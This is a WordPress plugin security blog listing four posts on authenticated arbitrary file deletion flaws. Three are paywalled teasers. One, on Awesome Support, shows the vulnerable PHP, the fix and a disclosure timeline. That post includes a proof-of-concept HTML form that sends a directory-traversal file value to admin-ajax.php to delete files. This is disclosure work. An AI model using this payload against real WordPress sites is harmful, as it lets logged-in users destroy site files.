16 Apr

Vulnerability Details: Authenticated Arbitrary File Deletion Vulnerability in Woo Import Export

From time to time a vulnerability in a plugin is disclosed without the discoverer putting out a complete report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

Last week, while looking into a report of a vulnerability that turned out to be an arbitrary file deletion ...


Our Vulnerability Details posts provide the details of vulnerabilities we didn't discover and access to them is limited to customers of our service due to other security companies trying to sponge off the work needed to create those instead of doing their own work.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a WordPress plugin security researcher please contact us to get free access to all of our Vulnerability Details posts.

13 Feb

Vulnerability Details: Authenticated Arbitrary File Deletion Vulnerability in Woocommerce CSV Import

From time to time a vulnerability is fixed in a plugin without the discoverer putting out a report on the vulnerability and we will put out a post detailing the vulnerability so that we can provide our customers with more complete information on the vulnerability.

One of the areas where we think that the wordpress.org Plugin Directory could probably improve how they handle things is ...


Our Vulnerability Details posts provide the details of vulnerabilities we didn't discover and access to them is limited to customers of our service due to other security companies trying to sponge off the work needed to create those instead of doing their own work.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a WordPress plugin security researcher please contact us to get free access to all of our Vulnerability Details posts.

23 Oct

Authenticated Arbitrary File Deletion Vulnerability in Awesome Support

As we mentioned in more detail the previous post discussing the other vulnerability we found in the plugin Awesome Support, after seeing them make some bad advice on making decisions on what plugin to use from a security perspective, we took at look at their plugin and in seconds found that it wasn’t secure.

The plugin allows anyone to create a WordPress account, which increases security risk due to the fact that many plugins do not properly restrict access to functionality in them to only certain logged in users, this plugin being one of them.

This plugin makes the function wpas_tools_log_viewer_delete() accessible to anyone logged in, by allowing access through WordPress’ AJAX functionality (in the file /includes/admin/functions-log-viewer.php):

99
add_action( 'wp_ajax_wpas_tools_log_viewer_delete', 'wpas_tools_log_viewer_delete', 10, 0 );

That function didn’t check to see a user has a particular capability, which would limit who can access it, or check for a valid nonce to prevent cross-site request forgery (CSRF) before running the function wpas_log_viewer_delete_file():

86
87
88
89
90
91
92
93
94
95
96
97
function wpas_tools_log_viewer_delete() {
 
	if( ! isset( $_POST[ 'file' ] ) ) {
		echo json_encode( array( 'error' => esc_html__( 'No file given', 'awesome-support' ) ) );
		wp_die();
	}
 
	$file = $_POST[ 'file' ];
 
	wp_send_json_success(	wpas_log_viewer_delete_file( $file ) );
 
}

When that function determines the file to unlink (delete) there was no restriction on directory traversal:

105
106
107
function wpas_log_viewer_delete_file( $file ) {
 
	if( unlink( get_logs_path() . $file ) ) {

So any file can be deleted.

After we notified the company behind this of the issue, version 4.3.2 was released, which fixes the issue by checking if the request to access the function is coming from an Administrator and that a valid nonce is provided (to prevent CSRF):

98
99
100
101
102
103
104
function wpas_tools_log_viewer_delete() {
 
	if ( ! current_user_can( 'administrator' ) ) {
		wp_send_json_error( array( 'error' => esc_html__( 'Not found', 'awesome-support' ) ) );
	}
 
	check_ajax_referer( 'wpas_tools_log_viewer_delete', 'nonce' );

And using the basename() function to remove directory traversal from the filename of the file to be deleted:

111
$file = basename( $_POST[ 'file' ] )

Proof of Concept

The following proof of concept will cause a file named test.txt in the root directory of the WordPress installation to be deleted, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpas_tools_log_viewer_delete" />
<input type="hidden" name="file" value="../../../../test.txt" />
<input type="submit" value="Submit" />
</form>
</body>

Timeline

  • October 17, 2017 – Developer notified.
  • October 17, 2017 – Developer responds.
  • October 22, 2017 – Version 4.3.2 released, which fixes vulnerability.
02 Jan

Vulnerability Details: Authenticated Arbitrary File Deletion Vulnerability in BuddyPress

From time to time vulnerabilities are fixed in plugin without someone putting out a report on the vulnerability and we will put out a post detailing the vulnerability. While putting out the details of the vulnerability increases the chances of it being exploited, it also can help to identify vulnerabilities that haven’t been fully fixed (in some cases not fixed at all) and help to identify additional vulnerabilities in ...


Our Vulnerability Details posts provide the details of vulnerabilities we didn't discover and access to them is limited to customers of our service due to other security companies trying to sponge off the work needed to create those instead of doing their own work.

For existing customers, please log in to your account to view the rest of the post.

If you are not currently a customer, you can try the service for free for the first month (there are a lot of other reason that you will want to sign up beyond access to posts like this one).

If you are a WordPress plugin security researcher please contact us to get free access to all of our Vulnerability Details posts.